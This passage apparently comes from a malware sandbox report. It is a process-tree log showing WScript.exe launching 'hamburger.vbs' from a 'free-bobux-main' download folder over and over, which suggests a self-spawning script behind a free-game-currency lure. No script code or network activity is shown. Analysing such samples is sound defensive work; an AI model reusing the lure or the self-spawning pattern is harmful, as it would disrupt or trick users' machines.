C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2100
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6876
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5244
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:864
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5716
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6708
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5184
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2844
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6640
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5196
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6528
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2396
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5940
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5936
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1544
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2492
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7156
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7128
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5052
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2776
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1048
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6220
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6384
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6148
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2144
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6228
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2660
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7072
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6580
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5928
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1252
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5856
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1164
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5416
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1080
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3548
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:344
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2184
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3456
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5524
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1580
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6180
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6260
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:976
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2928
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6292
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6496
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6284
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6872
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7120
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3656
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7112
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5836
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2752
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7172
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7188
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7212
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7256
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7276
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7340
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7360
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7380
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7416
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7464
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7516
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7564
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7584
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7608
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7632
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7684
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7712
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7740
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7796
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7824
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7840
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7860
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7900
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7924
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7964
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7980
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8000
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8076
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8088
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8132
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8188
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8224
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8260
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8300
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8332
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8388
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8452
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8492
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8528
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8572
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8604
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8640
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8668
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8696
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8716
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8748
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8764
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8812
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8824
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8844
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8884
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8924
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8980
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9008
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9028
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9052
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9072
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9100
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9128
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9176
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9192
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9204
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9252
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9288
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9320
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9340
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9360
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9380
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9448
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9456
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9468
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9536
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9572
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9580
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9632
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9648
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9676
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9716
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9800
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9828
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9836
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9860
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9884
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9932
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9956
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9976
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9992
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10024
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10064
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10096
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10124
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10140
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10228
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10192
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10208
-
-
